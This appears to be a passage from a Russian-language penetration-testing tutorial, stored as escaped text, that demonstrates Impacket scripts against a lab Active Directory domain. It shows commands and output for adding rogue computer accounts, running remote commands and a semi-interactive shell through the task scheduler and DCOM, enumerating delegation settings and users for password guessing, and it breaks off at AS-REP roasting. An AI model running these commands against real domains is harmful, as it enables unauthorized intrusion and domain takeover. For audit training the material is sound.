\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0432 \u043e\u0431\u0437\u043e\u0440 \u043d\u0435 \u0432\u0445\u043e\u0434\u044f\u0442 \u043f\u043e \u043f\u0440\u0438\u0447\u0438\u043d\u0435 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0443\u0441\u0442\u0430\u0440\u0435\u043b\u0438 \u0438\u043b\u0438 \u043d\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435. \u0414\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u043d\u0443\u0436\u043d\u044b \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043f\u0440\u0430\u0432\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u0447\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u0438\u0434\u043d\u043e \u0438\u0437 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u0432 \u0438 \u0437\u0434\u0440\u0430\u0432\u043e\u0433\u043e \u0441\u043c\u044b\u0441\u043b\u0430<\/s>.<\/p>\n
\u258d addcomputer<\/font><\/h3>\n
  \u0421\u043a\u0440\u0438\u043f\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u0447\u0451\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d. \u041f\u043e\u043b\u0435\u0437\u0435\u043d \u0434\u043b\u044f \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u0432 \u0441\u0435\u0442\u0438 \u043f\u043e\u0434 \u043f\u0441\u0435\u0432\u0434\u043e\u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0433\u043b\u044f\u0434\u0438\u0442 \u043d\u0435 \u0441\u043a\u0440\u0443\u043f\u0443\u043b\u0451\u0437\u043d\u044b\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440. \u041f\u043e\u0441\u043b\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0439 \u043e\u0441\u043d\u0430\u0441\u0442\u043a\u0435 Windows Server \u043f\u043e\u044f\u0432\u0438\u0442\u0441\u044f \u043d\u043e\u0432\u044b\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 COMPUTER2<\/i>:<\/p>\n
addcomputer.py -computer-name 'COMPUTER2$' -computer-pass 'SomePassword' -dc-ip 192.168.1.13 ad.ruvds.ru\/admin:password [*] Successfully added machine account COMPUTER2$ with password SomePassword. <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: addcomputer.py [-h] [-domain-netbios NETBIOSNAME] [-computer-name COMPUTER-NAME$] [-computer-pass password] [-no-add] [-delete] [-debug] [-method {SAMR,LDAPS}]                       [-port {139,445,636}] [-baseDN DC=test,DC=local] [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]                       [-dc-host hostname] [-dc-ip ip]                       [domain\/]username[:password]  positional arguments:   [domain\/]username[:password]                         Account used to authenticate to DC.  optional arguments:   -h, --help            show this help message and exit   -domain-netbios NETBIOSNAME                         Domain NetBIOS name. Required if the DC has multiple domains.   -computer-name COMPUTER-NAME$                         Name of computer to add.If omitted, a random DESKTOP-[A-Z0-9]{8} will be used.   -computer-pass password                         Password to set to computerIf omitted, a random [A-Za-z0-9]{32} will be used.   -no-add               Don't add a computer, only set password on existing one.   -delete               Delete an existing computer.   -debug                Turn DEBUG output ON   -method {SAMR,LDAPS}  Method of adding the computer.SAMR works over SMB.LDAPS has some certificate requirementsand isn't always available.   -port {139,445,636}   Destination port to connect to. SAMR defaults to 445, LDAPS to 636.  LDAP:   -baseDN DC=test,DC=local                         Set baseDN for LDAP.If ommited, the domain part (FQDN) specified in the account parameter will be used.   -computer-group CN=Computers,DC=test,DC=local                         Group to which the account will be added.If omitted, CN=Computers will be used,  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will                         use the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used   -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d atexec<\/font><\/h3>\n
  \u0421\u043e\u0437\u0434\u0430\u0451\u0442 \u0432 \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0435\u0433\u043e, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u0430\u044f \u0441\u0442\u0440\u043e\u043a\u0430 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435. \u0427\u0438\u0441\u0442\u043e\u0439 \u0432\u043e\u0434\u044b, \u0448\u0435\u043b\u043b-\u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a \u0437\u0430\u0434\u0430\u043d\u0438\u0439. \u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u043c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u043c \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u044b\u0439 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u0439:<\/p>\n
atexec.py ad.ruvds.ru\/admin:password@192.168.1.13 whoami [!] This will work ONLY on Windows >= Vista [*] Creating task \\QNyQPpyj [*] Running task \\QNyQPpyj [*] Deleting task \\QNyQPpyj [*] Attempting to read ADMIN$\\Temp\\QNyQPpyj.tmp [*] Attempting to read ADMIN$\\Temp\\QNyQPpyj.tmp nt authority\\\u0441\u0438\u0441\u0442\u0435\u043c\u0430 <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: atexec.py [-h] [-session-id SESSION_ID] [-ts] [-silentcommand] [-debug] [-codec CODEC] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]                  [-keytab KEYTAB]                  target [command ...]  positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>   command               command to execute at the target  optional arguments:   -h, --help            show this help message and exit   -session-id SESSION_ID                         an existed logon session to use (no output, no cmd.exe)   -ts                   adds timestamp to every logging output   -silentcommand        does not execute cmd.exe to run given command (no output)   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter   -keytab KEYTAB        Read keys for SPN from keytab file <\/code><\/pre>\n
  <\/div>\n<\/p><\/div>\n
  <\/p>\n
\u258d dcomexec<\/font><\/h3>\n
  \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f DCOM-\u043e\u0431\u044a\u0435\u043a\u0442 ShellBrowserWindow<\/i> (\u0432 \u043f\u0440\u0438\u043c\u0435\u0440\u0435, MMC20<\/i>). \u0427\u0442\u043e \u0441 \u044d\u0442\u0438\u043c \u0434\u0435\u043b\u0430\u0442\u044c \u0437\u0434\u0435\u0441\u044c \u0438 \u0434\u0430\u043b\u0435\u0435 \u043d\u0435 \u043e\u0433\u043e\u0432\u0430\u0440\u0438\u0432\u0430\u044e, \u0442\u0430\u043a \u043a\u0430\u043a \u0448\u0435\u043b\u043b \u043d\u0430 \u0442\u043e \u0438 \u0435\u0441\u0442\u044c \u0448\u0435\u043b\u043b, \u0447\u0442\u043e\u0431\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c:<\/p>\n
dcomexec.py ad.ruvds.ru\/admin:password@192.168.1.13 -object MMC20  [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands  C:\\>ipconfig  Windows IP Configuration   Unknown adapter OpenVPN Wintun:     Media State . . . . . . . . . . . : Media disconnected    Connection-specific DNS Suffix  . :  Unknown adapter OpenVPN TAP-Windows6:     Connection-specific DNS Suffix  . :    IPv4 Address. . . . . . . . . . . : 192.168.5.13    Subnet Mask . . . . . . . . . . . : 255.255.255.0    Default Gateway . . . . . . . . . :  Ethernet adapter Ethernet:     Connection-specific DNS Suffix  . :    IPv4 Address. . . . . . . . . . . : 192.168.1.13    Subnet Mask . . . . . . . . . . . : 255.255.255.0    Default Gateway . . . . . . . . . : 192.168.1.1  C:\\> <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-com-version MAJOR_VERSION:MINOR_VERSION]                    [-shell-type {cmd,powershell}] [-silentcommand] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]                    target [command ...]  positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>   command               command to execute at the target. If empty it will launch a semi-interactive shell  optional arguments:   -h, --help            show this help message and exit   -share SHARE          share where the output will be grabbed from (default ADMIN$)   -nooutput             whether or not to print the output (no SMB connection created)   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec   -object [{ShellWindows,ShellBrowserWindow,MMC20}]                         DCOM object to be used to execute the shell command (default=ShellWindows)   -com-version MAJOR_VERSION:MINOR_VERSION                         DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7   -shell-type {cmd,powershell}                         choose a command processor for the semi-interactive shell   -silentcommand        does not execute cmd.exe to run given command (no output, cannot run dir\/cd\/etc.)  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter   -A authfile           smbclient\/mount.cifs-style authentication file. See smbclient man page's -A option.   -keytab KEYTAB        Read keys for SPN from keytab file<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d exchanger<\/font><\/h3>\n
  \u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u0430\u0443\u0434\u0438\u0442\u0430 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Exchange<\/i>. \u041d\u0430 \u0441\u0442\u0435\u043d\u0434\u0435 \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u0438\u043c\u0435\u0435\u0442\u0441\u044f, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u044b\u0432\u043e\u0434 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439. \u0412 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0441\u043a\u0440\u0438\u043f\u0442 \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043b, \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u0437\u0434\u0435\u0441\u044c \u0432 \u0430\u043a\u0430\u0434\u0435\u043c\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0446\u0435\u043b\u044f\u0445:<\/p>\n
exchanger.py ad.ruvds.ru\/admin:password@192.168.1.13 nspi list-tables -count [-] Protocol failed: RPC Proxy Client: NTLM authentication failed in RPC_IN_DATA channel: HTTP\/1.1 404 Not Found <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: exchanger.py [-h] [-debug] [-rpc-hostname RPC_HOSTNAME] [-hashes LMHASH:NTHASH] target {nspi} ...   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>   {nspi}                A module name     nspi                Attack NSPI interface  optional arguments:   -h, --help            show this help message and exit   -debug                Turn DEBUG and EXTENDED output ON   -rpc-hostname RPC_HOSTNAME                         A name of the server in GUID (preferred) or NetBIOS name format (see description in the beggining of this file)  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d findDelegation<\/font><\/h3>\n
  \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0439. Constrained Delegation<\/font><\/b> \u2013 \u0434\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0445 \u0441\u043b\u0443\u0436\u0431. \u0421\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e Unconstrained Delegation<\/font><\/b> \u2013 \u043d\u0435\u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u043e\u0435 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435. \u041d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u043e\u0432\u044b\u0445 \u0432 Active Directory \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u0440\u044f\u043c\u0443\u044e \u0434\u043e\u0440\u043e\u0433\u0443 \u043a \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u043c \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u043e\u043a\u043e\u043d\u0447\u0438\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0430\u0443\u0434\u0438\u0442\u043e\u0440\u0430 \u0437\u0430\u0445\u0432\u0430\u0442\u043e\u043c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430\u0434 \u0432\u0441\u0435\u043c \u0434\u043e\u043c\u0435\u043d\u043e\u043c. \u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0435\u0441\u043b\u0438 \u0442\u0430\u043a\u0430\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 \u043d\u0430 Windows Server \u0438\u043c\u0435\u0435\u0442\u0441\u044f, \u0442\u043e \u0432\u044b\u0432\u043e\u0434 \u0431\u0443\u0434\u0435\u0442, \u043a\u0430\u043a \u0432 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u043d\u0438\u0436\u0435: \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043e \u0434\u043b\u044f \u0441\u043b\u0443\u0436\u0431 Ldap \u0438 \u0421ifs<\/a> \u0438 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 Backup<\/i>, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0435\u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u043e\u0435 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u043b\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 RUVDS-PC$<\/i>, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043f\u0430\u0434\u0430\u044e\u0442 \u0432 \u0441\u043a\u043e\u0443\u043f:<\/p>\n
findDelegation.py ad.ruvds.ru\/admin:password -dc-ip 192.168.1.13  AccountName  AccountType  DelegationType                      DelegationRightsTo -----------  -----------  ----------------------------------  ----------------------------------------------------------------- RUVDS-PC$    Computer     Unconstrained                       N\/A Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru\/ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru\/AD Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK\/AD Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru\/DomainDnsZones.ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  ldap\/WIN-LIELOSOD7LK.ad.ruvds.ru\/ForestDnsZones.ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK.ad.ruvds.ru\/ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK.ad.ruvds.ru Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK.ad.ruvds.ru\/AD Backup       Person       Constrained w\/ Protocol Transition  cifs\/WIN-LIELOSOD7LK\/AD <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: findDelegation.py [-h] [-target-domain TARGET_DOMAIN] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target   positional arguments:   target                domain\/username[:password]  optional arguments:   -h, --help            show this help message and exit   -target-domain TARGET_DOMAIN                         Domain to query\/request if different than the domain of the user. Allows for retrieving delegation info across trusts.   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d GetADUsers<\/font><\/h3>\n
  \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0434\u043e\u043c\u0435\u043d\u0430. \u0421\u043a\u0440\u0438\u043f\u0442 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d \u043d\u0435 \u043e\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043c\u043d\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0441\u043b\u043e\u0432\u0430\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u044f:<\/p>\n
GetADUsers.py ad.ruvds.ru\/admin:password -dc-ip 192.168.1.13 -all  [*] Querying 192.168.1.13 for information about domain. Name                  Email                           PasswordLastSet      LastLogon --------------------  ------------------------------  -------------------  ------------------- \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440                                         2022-07-03 21:47:50.410770  2023-02-05 22:32:32.875495 \u0413\u043e\u0441\u0442\u044c                                                 <never>              <never> krbtgt                                                2022-07-21 11:57:31.728056  <never> Ruvds                                                 2022-08-24 22:12:13.125652  2023-01-26 14:47:44.840025 test                                                  2023-01-12 20:56:06.969165  2023-01-26 10:15:10.800462 admin                                                 2023-01-24 20:05:11.514038  2023-01-26 10:45:42.058260 ca                                                    2023-01-26 10:17:49.333225  2023-01-26 10:23:01.488147 <\/code><\/pre>\n
  LastLogon<\/i> \u2014 \u043a\u043e\u0433\u0434\u0430 \u0431\u044b\u043b \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0432\u0445\u043e\u0434 \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, PasswordLastSet <\/i>\u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d \u043d\u0438\u0436\u0435.<\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: GetADUsers.py [-h] [-user username] [-all] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target   positional arguments:   target                domain\/username[:password]  optional arguments:   -h, --help            show this help message and exit   -user username        Requests data for specific user   -all                  Return all users, including those with no email addresses and disabled accounts. When used with -user it will return user's info even if the account is                         disabled   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d getArch<\/font><\/h3>\n
  \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0443 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441\u0435\u0440\u0432\u0435\u0440\u0430. \u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0432\u044b\u0431\u043e\u0440 \u043d\u0435\u0432\u0435\u043b\u0438\u043a, \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u043d \u0437\u0434\u0435\u0441\u044c \u0441 \u0430\u043a\u0430\u0434\u0435\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0446\u0435\u043b\u044c\u044e:<\/p>\n
getArch.py -target 192.168.1.13  [*] Gathering OS architecture for 1 machines [*] Socket connect timeout set to 2 secs 192.168.1.13 is 64-bit <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: getArch.py [-h] [-target TARGET] [-targets TARGETS] [-timeout TIMEOUT] [-debug]  optional arguments:   -h, --help        show this help message and exit   -target TARGET    <targetName or address>   -targets TARGETS  input file with targets system to query Arch from (one per line).   -timeout TIMEOUT  socket timeout out when connecting to the target (default 2 sec)   -debug            Turn DEBUG output ON<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d GetNPUsers<\/font><\/h3>\n
  \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u043c \u041d\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Kerberos<\/i>, \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u043e\u0442\u0432\u0435\u0442\u044b AS_REP<\/i> \u0431\u0435\u0437 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u0442 \u0438\u0445 TGT<\/a> 